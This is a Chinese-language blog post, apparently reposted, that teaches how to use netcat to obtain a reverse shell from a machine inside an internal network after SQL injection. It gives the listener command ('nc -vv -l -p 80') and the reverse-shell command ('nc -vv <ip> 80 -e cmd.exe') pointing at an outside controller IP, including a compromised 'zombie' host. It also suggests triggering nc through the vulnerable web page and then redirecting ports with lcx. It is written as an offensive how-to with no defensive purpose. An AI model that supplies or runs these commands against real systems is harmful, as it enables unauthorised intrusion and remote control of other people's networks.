nc命令小材大用
nc命令小材大用 simeon 通過本文你可以學到: 1、SQL注入內網***的一種思路 2、nc命令的一種好用法 ?? 內網***對于網絡安全愛好者,特別是網絡***檢測時無疑是一種疼,很多時候我們遇到這種情況只有采取放棄,其實不然,完全使用另外一種方法來進行突破。很多人多知道nc號稱瑞士軍刀,是一款非常不錯的網絡安全工具,其強大的功能毫不遜于一款遠程控制軟件,只是我們沒有挖掘其強大的功能而已。本文只是探討如何來進行內網突破的思維。下面講講本文對nc的具體用法。 (一)在控制端監聽端口 這個控制端可以是自己的肉雞,可以是在具有獨立IP的網絡計算機上,一定要具有獨立IP,否則無法反彈到該IP地址。使用命令如下: Nc –vv –l –p port 例如 nc –vv –l –p 80 在控制端監聽端口時,需要注意的是,需要先使用“netstat -an”查看網絡端口的開放情況(圖1),選擇一個未監聽的端口,一般選擇80,443,446,110,25,23端口為好,當然其他未用端口也可以。 <?xml:namespace prefix = v ns = "urn:schemas-microsoft-com:vml" /><?xml:namespace prefix = o ns = "urn:schemas-microsoft-com:office:office" /> 圖1 使用netstat –an 查看端口開情況 說明:如果控制端已經開放了我們要監聽的端口,那么我們使用nc監聽該端口不會成功,nc程序會提示錯誤信息,如果監聽正常,會顯示“Listening on? [any] 80 …….”字樣(圖2)。 圖2 在控制端監聽80端口 (二)在內網計算機開放端口 ????? 在內網計算機上運行“nc –vv ipaddress port –e cmd.exe”,這里的IPaddress一定是控制端的ip地址,例如控制端的地址為“202.108.<?xml:namespace prefix = st1 ns = "urn:schemas-microsoft-com:office:smarttags" />33.32”,且80端口未開放,則在內網計算機上運行“nc –vv -202.108.33.32 80 –e cmd.exe”即可。如果一切正常,則會反彈一個dosshell回來,跟cmd命令的運行界面差不多,就象在本機的DOS下操作一樣,非常好用,可以粘貼命令,直接執行命令等(圖3)。使用“net user”命令,可以看到我的賬號“simeon”在其中。 圖3 反彈shell成功 (三)其它運用 本文介紹的是如何使用nc來反彈內網的shell,在sql注入的過程中,很多時候遇到獨立主機是內網IP,及時主機開放了3389也無法連接進去,這個時候,一個真正的dosshell就特別重要,通過網頁執行nc命令,提供該內網一個shell,然后執行lcx端口重定向或者執行反彈***或者其他命令,無疑是一個很好的解決方法。 (四)結束語 ??? 本文就技術難度來說,并不是很大,nc這個軟件很多朋友都熟悉,可以這么說,搞網絡安全的沒有不熟悉nc這個軟件的,但是對于nc命令的很多用法,不一定熟悉。想不起來曾經看過的一部電影,其中有這么一段話,高手就是將一個復雜的動作做到單一和簡單!這跟真正的武林高手一樣,不一定需要太多招式,一刀一劍就可以致命取勝。網絡安全也是如此,對一個工具要熟能生巧,舉一反三,才能出現更多的用法,更多的新的idea,期待大家新的發現。
總結
- 上一篇: .Net 事件类型的实现和推荐做法
- 下一篇: 每天学一点flash(16) as3.0